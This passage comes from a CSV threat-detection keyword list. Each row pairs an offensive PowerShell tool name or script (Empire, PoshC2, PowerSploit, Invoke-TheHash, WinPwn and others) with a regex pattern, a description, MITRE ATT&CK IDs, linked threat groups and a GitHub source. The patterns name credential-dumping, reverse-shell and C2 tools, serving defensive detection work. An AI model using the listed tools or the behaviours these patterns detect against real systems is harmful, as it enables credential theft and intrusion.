Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49817" "*Invoke-WCMDump*",".{0,1000}Invoke\-WCMDump.{0,1000}","offensive_tool_keyword","Invoke-WCMDump","PowerShell script to dump Windows credentials from the Credential Manager Invoke-WCMDump enumerates Windows credentials in the Credential 
Manager and then extracts available information about each one. Passwords are retrieved for Generic type credentials. but can not be retrieved by the same method for Domain type credentials. Credentials are only returned for the current user","T1003 - T1003.003 - T1003.001 - T1552","TA0006 - TA0006 - TA0006 - TA0006","N/A","N/A","Credential Access","https://github.com/peewpw/Invoke-WCMDump","1","1","N/A","N/A","10","8","722","134","2017-12-12T00:46:33Z","2017-12-09T21:36:59Z","49818" "*Invoke-WCMDump*",".{0,1000}Invoke\-WCMDump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49819" "*Invoke-WCMDump.ps1*",".{0,1000}Invoke\-WCMDump\.ps1.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","49820" "*Invoke-WDigest.ps1*",".{0,1000}Invoke\-WDigest\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49821" "*Invoke-WdigestDowngrade*",".{0,1000}Invoke\-WdigestDowngrade.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49822" "*Invoke-WebCamAvi.ps1*",".{0,1000}Invoke\-WebCamAvi\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49823" "*Invoke-WebRequest https://tinyurl.com/*",".{0,1000}Invoke\-WebRequest\shttps\:\/\/tinyurl\.com\/.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","49824" "*Invoke-WebRequest -Uri ""http://ip-api.com/line/?*",".{0,1000}Invoke\-WebRequest\s\-Uri\s\""http\:\/\/ip\-api\.com\/line\/\?.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","49826" "*Invoke-WebRev.ps1*",".{0,1000}Invoke\-WebRev\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49827" "*Invoke-Whisker*",".{0,1000}Invoke\-Whisker.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49828" "*Invoke-WindowsEnum*",".{0,1000}Invoke\-WindowsEnum.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell Scripts focused on Post-Exploitation Capabilities","T1082 - T1087 - T1057 - T1518 - T1016","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","N/A","8","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","49829" "*Invoke-WindowsEnum.ps1*",".{0,1000}Invoke\-WindowsEnum\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49830" "*Invoke-WindowsUpdateCheck*",".{0,1000}Invoke\-WindowsUpdateCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49831" "*Invoke-WinEnum*",".{0,1000}Invoke\-WinEnum.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - 
FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-WinEnum.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49832" "*Invoke-WinEnum.ps1*",".{0,1000}Invoke\-WinEnum\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1145","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider 
- CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49833" "*Invoke-WinlogonCheck*",".{0,1000}Invoke\-WinlogonCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49834" "*Invoke-WinlogonCheck*",".{0,1000}Invoke\-WinlogonCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49835" "*Invoke-winPEAS*",".{0,1000}Invoke\-winPEAS.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49836" "*Invoke-winPEAS*",".{0,1000}Invoke\-winPEAS.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49837" 
"*Invoke-winPEAS.ps1*",".{0,1000}Invoke\-winPEAS\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49838" "*invoke-winrmsession*",".{0,1000}invoke\-winrmsession.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 
- T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49839" "*Invoke-WireTap*",".{0,1000}Invoke\-WireTap.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49840" "*Invoke-WireTap.ps1*",".{0,1000}Invoke\-WireTap\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - 
MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49841" "*Invoke-WlanProfilesCheck*",".{0,1000}Invoke\-WlanProfilesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49842" "*Invoke-WLMDR*",".{0,1000}Invoke\-WLMDR.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49843" "*Invoke-WmicDriveBy.*",".{0,1000}Invoke\-WmicDriveBy\..{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell Scripts focused on Post-Exploitation Capabilities","T1059.001 - T1021.002 - T1566.002","TA0002 - TA0009 - TA0043","N/A","N/A","Discovery","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","N/A","8","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","49844" "*Invoke-WmiCommand *",".{0,1000}Invoke\-WmiCommand\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to 
aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49845" "*Invoke-WmiCommand*",".{0,1000}Invoke\-WmiCommand.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","49846" "*Invoke-WMICommand.ps1*",".{0,1000}Invoke\-WMICommand\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfiltration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49847" "*Invoke-WMIDebugger*",".{0,1000}Invoke\-WMIDebugger.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49848" "*Invoke-WMIExec *",".{0,1000}Invoke\-WMIExec\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. 
Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49849" "*invoke-wmiexec *",".{0,1000}invoke\-wmiexec\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49850" "*Invoke-WMIExec*",".{0,1000}Invoke\-WMIExec.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49851" "*Invoke-WMIExec*",".{0,1000}Invoke\-WMIExec.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black 
